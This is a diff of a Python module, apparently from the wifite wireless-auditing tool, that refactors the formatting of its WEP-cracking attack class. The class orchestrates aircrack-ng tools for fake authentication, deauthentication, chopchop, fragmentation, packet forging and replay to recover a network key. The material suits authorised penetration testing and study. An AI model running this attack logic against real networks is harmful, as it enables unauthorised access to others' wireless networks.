@@ -1,23 +1,22 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
-from ..model.attack import Attack
-from ..tools.airodump import Airodump
-from ..tools.aireplay import Aireplay, WEPAttackType
-from ..tools.aircrack import Aircrack
-from ..tools.ip import Ip
-from ..config import Configuration
-from ..util.color import Color
-from ..util.input import raw_input
-from ..model.wep_result import CrackResultWEP
-
 import time
 
+from ..config import Configuration
+from ..model.attack import Attack
+from ..model.wep_result import CrackResultWEP
+from ..tools.aircrack import Aircrack
+from ..tools.aireplay import Aireplay, WEPAttackType
+from ..tools.airodump import Airodump
+from ..tools.ip import Ip
+from ..util.color import Color
+
 
 class AttackWEP(Attack):
-    '''
+    """
         Contains logic for attacking a WEP-encrypted access point.
-    '''
+    """
 
     fakeauth_wait = 5  # TODO: Configuration?
 
@@ -27,11 +26,11 @@ class AttackWEP(Attack):
         self.success = False
 
     def run(self):
-        '''
+        """
             Initiates full WEP attack.
             Including airodump-ng starting, cracking, etc.
             Returns: True if attack is successful, false otherwise
-        '''
+        """
 
         aircrack = None  # Aircrack process, not started yet
         fakeauth_proc = None
@@ -75,8 +74,8 @@ class AttackWEP(Attack):
                         # Failed to fakeauth, can't use our MAC.
                         # And there are no associated clients. Use one and tell the user.
                         Color.pl('{!} {O}there are no associated clients{W}')
-                        Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
-                                 ' without fake-authentication or associated clients{W}')
+                        Color.pl('{!} {R}WARNING: {O}many attacks will not succeed '
+                                 'without fake-authentication or associated clients{W}')
                         client_mac = None
                     else:
                         # Fakeauth failed, but we can re-use an existing client
@@ -95,7 +94,6 @@ class AttackWEP(Attack):
                     last_ivs_count = 0
 
                     # Loop until attack completes.
-
                     while True:
                         airodump_target = self.wait_for_target(airodump)
 
@@ -123,16 +121,18 @@ class AttackWEP(Attack):
                         # Check if we cracked it.
                         if aircrack and aircrack.is_cracked():
                             (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
-                            bssid = airodump_target.bssid
-                            if airodump_target.essid_known:
-                                essid = airodump_target.essid
-                            else:
-                                essid = None
+                            # bssid = airodump_target.bssid
+                            # if airodump_target.essid_known:
+                            #     essid = airodump_target.essid
+                            # else:
+                            #     essid = None
                             Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' % attack_name)
-                            if aireplay: aireplay.stop()
-                            if fakeauth_proc: fakeauth_proc.stop()
-                            self.crack_result = CrackResultWEP(self.target.bssid,
-                                    self.target.essid, hex_key, ascii_key)
+                            if aireplay:
+                                aireplay.stop()
+                            if fakeauth_proc:
+                                fakeauth_proc.stop()
+
+                            self.crack_result = CrackResultWEP(self.target.bssid, self.target.essid, hex_key, ascii_key)
                             self.crack_result.dump()
 
                             Airodump.delete_airodump_temp_files('wep')
@@ -156,8 +156,8 @@ class AttackWEP(Attack):
                                     aircrack = Aircrack(ivs_files)
 
                             elif 0 < Configuration.wep_restart_aircrack < aircrack.pid.running_time():
-                                # Restart aircrack after X seconds
-                                # Color.pl('\n{+} {C}aircrack{W} ran for more than {C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack)
+                                # Restart aircrack after X seconds Color.pl('\n{+} {C}aircrack{W} ran for more than {
+                                # C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack)
                                 aircrack.stop()
                                 ivs_files = airodump.find_files(endswith='.ivs')
                                 ivs_files.sort()
@@ -170,7 +170,6 @@ class AttackWEP(Attack):
                             # Some Aireplay attacks loop infinitely
                             if attack_name == 'chopchop' or attack_name == 'fragment':
                                 # We expect these to stop once a .xor is created, or if the process failed.
-
                                 replay_file = None
 
                                 # Check for .xor file.
@@ -184,21 +183,20 @@ class AttackWEP(Attack):
                                     break
 
                                 # If .xor exists, run packetforge-ng to create .cap
-                                Color.pl('\n{+} {C}%s attack{W}' % attack_name +
-                                        ' generated a {C}.xor file{W}, {G}forging...{W}')
-                                replay_file = Aireplay.forge_packet(xor_file,
-                                                                   airodump_target.bssid,
-                                                                   client_mac)
+                                Color.pl(
+                                    '\n{+} {C}%s attack{W}'
+                                    % attack_name + ' generated a {C}.xor file{W}, {G}forging...{W}')
+                                replay_file = Aireplay.forge_packet(xor_file, airodump_target.bssid, client_mac)
                                 if replay_file:
-                                    Color.pl('{+} {C}forged packet{W},' +
-                                             ' {G}replaying...{W}')
+                                    Color.pl('{+} {C}forged packet{W}, {G}replaying...{W}')
                                     wep_attack_type = WEPAttackType('forgedreplay')
                                     attack_name = 'forgedreplay'
                                     aireplay = Aireplay(self.target,
                                                         'forgedreplay',
                                                         client_mac=client_mac,
                                                         replay_file=replay_file)
-                                    time_unchanged_ivs = time.time()  # Reset unchanged IVs time (it may have taken a while to forge the packet)
+                                    time_unchanged_ivs = time.time()  # Reset unchanged IVs time (it may have taken a
+                                    # while to forge the packet)
                                     continue
                                 else:
                                     # Failed to forge packet. drop out
@@ -213,15 +211,14 @@ class AttackWEP(Attack):
                         if airodump_target.ivs > last_ivs_count:
                             time_unchanged_ivs = time.time()
                         elif Configuration.wep_restart_stale_ivs > 0 and \
-                             attack_name != 'chopchop' and \
-                             attack_name != 'fragment':
+                                attack_name != 'chopchop' and \
+                                attack_name != 'fragment':
                             stale_seconds = time.time() - time_unchanged_ivs
                             if stale_seconds > Configuration.wep_restart_stale_ivs:
                                 # No new IVs within threshold, restart aireplay
                                 aireplay.stop()
-                                Color.pl('\n{!} restarting {C}aireplay{W} after' +
-                                         ' {C}%d{W} seconds of no new IVs'
-                                             % stale_seconds)
+                                Color.pl('\n{!} Restarting {C}aireplay{W} after {C}%d{W} seconds of no new IVs'
+                                         % stale_seconds)
                                 aireplay = Aireplay(self.target,
                                                     wep_attack_type,
                                                     client_mac=client_mac,
@@ -235,7 +232,7 @@ class AttackWEP(Attack):
                 # End of with-airodump
             except KeyboardInterrupt:
                 if fakeauth_proc:
-                        fakeauth_proc.stop()
+                    fakeauth_proc.stop()
                 if len(attacks_remaining) == 0:
                     if keep_ivs:
                         Airodump.delete_airodump_temp_files('wep')
@@ -263,10 +260,10 @@ class AttackWEP(Attack):
         return self.success
 
     def user_wants_to_stop(self, current_attack, attacks_remaining, target):
-        '''
+        """
         Ask user what attack to perform next (re-orders attacks_remaining, returns False),
         or if we should stop attacking this target (returns True).
-        '''
+        """
         if target is None:
             Color.pl('')
             return True
@@ -277,19 +274,21 @@ class AttackWEP(Attack):
 
         # Deauth clients & retry
         attack_index = 1
-        Color.pl('     {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}' % (current_attack, target_name))
+        Color.pl('     {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}' % (
+            current_attack, target_name))
 
         # Move onto a different WEP attack
         for attack_name in attacks_remaining:
             attack_index += 1
-            Color.pl('     {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}' % (attack_index, attack_name, target_name))
+            Color.pl(
+                '     {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}' % (attack_index, attack_name, target_name))
 
         # Stop attacking entirely
         attack_index += 1
         Color.pl('     {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}' % attack_index)
         while True:
             Color.p('{?} Select an option ({G}1-%d{W}): ' % attack_index)
-            answer = raw_input()
+            answer = input()
             if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index:
                 Color.pl('{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}' % attack_index)
                 continue
@@ -325,14 +324,14 @@ class AttackWEP(Attack):
             return True  # Stop attacking
         elif answer > 1:
             # User selected specific attack: Re-order attacks based on desired next-step
-            attacks_remaining.insert(0, attacks_remaining.pop(answer-2))
+            attacks_remaining.insert(0, attacks_remaining.pop(answer - 2))
             return False  # Don't stop
 
     def fake_auth(self):
-        '''
+        """
         Attempts to fake-authenticate with target.
         Returns: True if successful, False is unsuccessful.
-        '''
+        """
         Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' % self.target.bssid)
         fakeauth = Aireplay.fakeauth(self.target, timeout=AttackWEP.fakeauth_wait)
         if fakeauth:
@@ -341,23 +340,20 @@ class AttackWEP(Attack):
             Color.pl(' {R}failed{W}')
             if Configuration.require_fakeauth:
                 # Fakeauth is required, fail
-                raise Exception(
-                    'Fake-authenticate did not complete within' +
-                    ' %d seconds' % AttackWEP.fakeauth_wait)
+                raise Exception('Fake-authenticate did not complete within %d seconds' % AttackWEP.fakeauth_wait)
             else:
                 # Warn that fakeauth failed
-                Color.pl('{!} {O}' +
-                    'unable to fake-authenticate with target' +
-                    ' (%s){W}' % self.target.bssid)
-                Color.pl('{!} continuing attacks because' +
-                    ' {G}--require-fakeauth{W} was not set')
+                Color.pl('{!} {O} unable to fake-authenticate with target (%s){W}' % self.target.bssid)
+                Color.pl('{!} continuing attacks because {G}--require-fakeauth{W} was not set')
         return fakeauth
 
 
 if __name__ == '__main__':
     Configuration.initialize(True)
     from ..model.target import Target
-    fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46,  6,  54e,WEP, WEP, , -58,        2,        0,   0.  0.  0.  0,   9, Test Router Please Ignore, '.split(',')
+
+    fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46,  6,  54e,WEP, WEP, , -58,        2' \
+             ',        0,   0.  0.  0.  0,   9, Test Router Please Ignore, '.split(',')
     target = Target(fields)
     wep = AttackWEP(target)
     wep.run()
